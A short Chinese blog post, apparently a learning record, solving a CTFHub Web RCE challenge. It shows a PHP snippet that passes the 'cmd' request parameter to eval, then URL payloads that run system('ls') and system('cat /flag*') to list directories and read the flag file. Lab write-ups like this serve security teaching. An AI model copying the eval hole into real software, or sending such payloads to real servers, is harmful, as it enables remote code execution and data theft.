CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
深蓝海拓7 分钟前
西门子S7-1500PLC的PEEK/POKE学习笔记
笔记·学习
li星野8 分钟前
DeepSeek提示词使用
人工智能·学习·deepseek
努力学习的明20 分钟前
JVM 学习路线与实战指南:内存管理、GC 机制及问题诊断
jvm·学习
狮驼岭的小钻风25 分钟前
python系统学习
学习
一定要AK7 小时前
刷题时的学习笔记
c++·笔记·学习
xxxibolva9 小时前
SQL 学习
数据库·sql·学习
星辰即远方11 小时前
OC学习Foudation框架
学习·ios·objective-c
yyk的萌12 小时前
AI 应用开发工程师基础学习计划
开发语言·python·学习·ai·lua
龘龍龙13 小时前
大模型学习(三)-RAG、LangChain
学习·langchain
计算机安禾14 小时前
【数据结构与算法】第22篇:线索二叉树(Threaded Binary Tree)
c语言·开发语言·数据结构·学习·算法·链表·visual studio code
热门推荐
01GitHub 镜像站点022026年3月AI领域大事件:DeepSeek引领开源风暴03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04黄金未来走势预测05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)